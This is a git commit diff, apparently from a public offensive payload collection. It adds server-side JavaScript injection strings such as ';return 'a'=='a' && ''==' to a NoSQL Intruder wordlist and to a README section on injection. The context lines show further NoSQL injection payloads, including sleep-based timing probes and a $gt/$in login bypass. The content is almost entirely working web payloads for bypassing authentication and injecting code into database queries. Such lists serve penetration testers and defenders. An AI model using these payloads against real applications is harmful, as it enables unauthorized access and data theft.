Added basic SSJI paylods

2022-05-17 09:53:37 +05:30 · 2022-05-17 09:53:37 +05:30 · af973ef0ad
parent 5035ed0891
commit af973ef0ad
2 changed files with 16 additions and 0 deletions
--- a/Injection/Intruder/NoSQL.txt
+++ b/Injection/Intruder/NoSQL.txt
@ -20,3 +20,6 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 ';sleep(5000);'
 ';sleep(5000);+'
 ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
+';return 'a'=='a' && ''=='
+";return(true);var xyz='a
+0;return true
--- a/Injection/README.md
+++ b/Injection/README.md
@ -19,6 +19,7 @@

 * [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
 * [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab)
+* [Burp-NoSQLiScanner - Plugin available in burpsuite](https://github.com/matrix/Burp-NoSQLiScanner)  

 ## Exploit

@ -70,6 +71,14 @@ Extract data with "in"
 {"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
 ```

+### SSJI 
+
+```json
+';return 'a'=='a' && ''=='
+";return 'a'=='a' && ''=='
+0;return true
+```
+

 ## Blind NoSQL

@ -165,6 +174,9 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 '%20%26%26%20this.passwordzz.match(/.*/)//+%00
 {$gt: ''}
 [$ne]=1
+';return 'a'=='a' && ''=='
+";return(true);var xyz='a
+0;return true
 ```

 ## References
@ -173,3 +185,4 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi
 * [Testing for NoSQL injection - OWASP](https://www.owasp.org/index.php/Testing_for_NoSQL_injection)
 * [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists)
 * [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb)
+* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)